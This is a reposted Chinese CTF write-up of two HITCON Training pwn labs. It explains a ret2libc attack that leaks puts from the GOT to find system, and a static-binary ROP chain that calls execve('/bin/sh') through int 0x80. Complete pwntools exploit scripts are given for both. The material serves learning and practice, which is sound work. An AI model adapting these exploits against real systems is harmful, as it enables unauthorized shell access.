Pwn-10月24-hitcon(二)

最新推荐文章于 2023-09-24 23:38:35 发布
最新推荐文章于 2023-09-24 23:38:35 发布
阅读量167 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/yof3ng/p/9845470.html
版权

目录

Pwn-10月24-hitcon(二)

继续hitcon的解题之路。

lab4 - ret2lib

拿到题目看题目名,和lab3的ret2sc差不多,这个应该是return to libc,也是一种攻击手法。泄露libc并且leak出libc基地址,从而getshell??

检查保护措施

checksec ret2lib:

5bcffda0c6f43.png

逻辑分析

简单跑一下:

5bd0000628c22.png

程序让我们输入一个地址,以整型的形式输入,然后它会返回这个地址存有的内容给我们,然后让我们leave some message,并且打印出来,我们可以通过这个功能从GOT表中将一些函数的真实地址打印出来,然后通过libc文件中函数的偏移量计算基地址,例如将某一个函数的GOT条目的地址传给write函数,就可以泄漏这个函数在进程空间中的真实地址,GOT表中所存的puts函数的地址便是在ret2lib进程中的实际地址。

IDA里面看看:

5bd003fbb31e4.png

通过命令readelf -V ret2lib可以查到其libc库版本为libc.so.6

5bd009e18b194.png

通过pwntools的elf模块我们可以链接该libc.so.6库,简单看看里面的函数地址:

5bd00c1190711.png

同样针对这题可以使用IDA alt + t来查找GOT表puts地址,也可通过上述ELF模块链接ret2lib程序,通过elf.got['puts']来获取GOT表中puts条目地址:

5bd00d4fb5348.png

5bd00d70f16de.png

将134520860作为我们需要获得内容的地址输入程序:

Do you know return to library ?
###############################
What do you want to see in memory?
Give me an address (in dec) :134520860                                           
The content of the address : 0xf7639250

然后我们就得到了puts函数条目在存在GOT表中的内容,即此次程序运行时puts函数的真实地址0xf7639250

libc基地址计算:libcbase_addr = puts_addr - libc_puts = 0xf7639250 - 0x67250 = 0xf75d2000

这里我只是简单的展示一下计算方法,实际上在程序运行过程中libc的基地址是会发生变化的,所以不能提前计算好基地址,再写exp,要在exp里面计算基地址,这样就不会出错。

既然已经可以计算出system函数的地址了,那么我们就需要找一个sh,可以寻找binary程序本身中的字符串,也可以使用libc中的:

5bd012dbb4bb5.png

然后我们可以通过Print_message()函数溢出,覆盖EIP的值使其跳转执行system函数:

5bd017ba13b3e.png

5bd018a67369c.png

可以看到padding长度为60,接下来写exp即可.

构造exp

libcbase_addr = puts_addr - libc_puts

system_addr = libcbase_addr + libc.symbols['system']

return_addr = 'anything'

exp:

#!/usr/bin/env python
#coding:utf-8

from pwn import *

io = process("./ret2lib")
elf = ELF("./ret2lib")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc_puts = libc.symbols["puts"]

io.sendlineafter(" :", str(elf.got["puts"]))
io.recvuntil(" : ")
libcbase_addr = int(io.recvuntil("\n"), 16) - libc_puts
return_addr = 0x0804857D #main函数地址

success("libcbase_addr -> {:#x}".format(libcbase_addr))
system_addr = libcbase_addr + libc.symbols["system"]

payload = flat(cyclic(60), system_addr, return_addr, next(elf.search("sh\x00")))
#sh\x00是因为可能匹配到其他字符串,从而加个截断
io.sendlineafter(" :", payload)

io.interactive()
io.close()

运行效果:

5bd01b3e9b344.png

lab5-simplerop

simplerop ==> easyrop ==> babyrop?经历绝望的过程?,又是一个构造ropchain的题目。

检查保护措施

checksec ./simplerop

5bd02cfbed61f.png

开启了NX,栈不可执行防护。

逻辑分析

通过ida看看:

5bd037bdc39d0.png

逻辑十分简单,就溢出然后构造rop chain,通过gdb动态调试得到溢出点,padding为32:

5bd0380835b4e.png

但是这个题型貌似叫:ret2systemcall,此程序中既无system函数,也无/bin/sh字符串,还是静态编译,新姿势 ==>rop chain后 int 0x80中断从而执行系统调用==> execve(/bin/sh)

原理:通过一系列 pop|ret 等gadget,使得 eax = 0xb(execve 32 位下的系统调用号),ebx -> /bin/sh, ecx = edx = 0,然后通过 int 0x80 实现系统调用,执行 execve(“/bin/sh”, 0, 0)

5bd03efc07ec3.png

不知道为啥我的ROPgadget查不到我们想要的gadget。

构造exp

exp:

#!/usr/bin/env python
#coding:utf-8
from pwn import*  
p = process('./simplerop')  
elf = ELF('./simplerop')  
  
pop_edx_ecx_ebx = 0x0806eca0  
pop_eax = 0x080b7e26  
pop_edx = 0x0806ec7a  
int_80 = 0x0806c8f5  
gadget = 0x080707b9 # mov word ptr [edx],eax  
bss = elf.bss()  
read_plt = elf.symbols['read']  
  
  
p.recv()  
payload = 'a'*32 + p32(pop_edx) +p32(bss)+ p32(pop_eax) +"/bin"+ p32(gadget)  
payload +=  p32(pop_edx) + p32(bss+4) + p32(pop_eax) + "/sh\x00" + p32(gadget)  
payload += p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(bss) 
payload += p32(pop_eax) + p32(0xb)  
payload += p32(int_80)  
  
p.send(payload)  
p.interactive()

运行效果:

5bd043f350073.png

小结

内容涉及: libc泄露,leak libc基地址,ropchain系统调用(int 0x80)。

ropchain系统调用原理:在无system函数,/bin/sh可用的情况下,通过一系列 pop|ret 等gadget,使得 eax = 0xb(execve 32 位下的系统调用号),ebx -> /bin/sh, ecx = edx = 0,然后通过 int 0x80 实现系统调用,执行 execve(“/bin/sh”, 0, 0)。

转载于:https://www.cnblogs.com/yof3ng/p/9845470.html

weixin_30553837
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HITCON Training Lab4 Writeup
博客
06-30 134
首先查看文件的基本属性: 查看整个文件反编译出来的结果: int __cdecl main(int argc, const char **argv, const char **envp) { char **v3; // ST04_4@1 int v4; // ST08_4@1 __int16 v6; // [sp+12h] [bp-10Eh]@1 __int16 v7; // [sp+112h] [bp-Eh]@1 _DWORD *v8; // [sp+11Ch] [bp-
CMCC--simplerop 题解
lifanxin的博客
03-28 1563
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
cmcc_simplerop解题过程
最新发布
weixin_55013445的博客
09-24 191
cmcc_simplerop解题流程
菜鸟PWN手进阶之栈溢出基础
re1wn
01-03 6837
菜鸟PWN手进阶之栈溢出基础
PWN-基本rop-Ret2sc
weixin_42306891的博客
04-18 750
1,题目:在对应的文件夹中; 2,工具:IDA,GDB 3,解法思路:基本rop溢出; 4,解法: 1,IDA大法好: 可以看出是要把shellcode写到name的空间里面去; 2,这里进行对name寻址 然后看栈的大小: 这里压栈一次esp-4,ebp不变,esp是栈顶指针寄存器,堆栈操作只和esp有关 比如有一个函数a,有两个参数,一般是这样的 PUSH ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
Bugku S3 AWD排位赛-9 pwn进制
08-27
Bugku S3 AWD排位赛-9 pwn进制
cmcc_simplerop
个人笔记
05-08 117
int80(11,“/bin/sh”,null,null),后面的四个参数分别是eax、ebx、ecx、edx。由于未开启PIE,我们利用simplerop中的read()函数写入bss段。2、ROPgadget找寄存器。偏移:0x14+4(错误)
python2安装pwntools_pwntools安装与简单使用(初学习持续更新)
weixin_36465073的博客
01-24 3233
小白一枚,初学轻喷0x01.pwntools简介pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,基本涵盖了pwn题利用脚本所需要的各种工具。0x02.pwntools安装在Ubuntu中安装,这个是python2的,python3不能pip安装,还要安装其他东西,在这里就不详述了sudo pip install pwntool...
Pwntools使用介绍
Onlyone_1314的博客
09-08 1317
  Pwntools 是一个 CTF 框架和漏洞利用开发库。它用 Python 编写,专为快速原型设计和开发而设计,旨在使漏洞利用编写尽可能简单。   Pwntools 分为两个模块,一个是 pwn,简单地使用 from pwn import * 即可将所有子模块和一些常用的系统库导入到当前命名空间中,是专门针对 CTF 比赛的;而另一个模块是 pwnlib,它更推荐你仅仅导入需要的子模块,常用于基于 pwntools 的开发。 pwn 下面是 pwn 的一些常用命令行工具: pwn asm 和 disas
cmcc Simplerop
Morphy_Amo的博客
03-17 3935
rop
【How2Pwn】Return to Library问题
Jeongon的博客
08-29 203
关于Return to Libaray的题目,以及解题思路
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 373
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 484
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 246
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 465
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值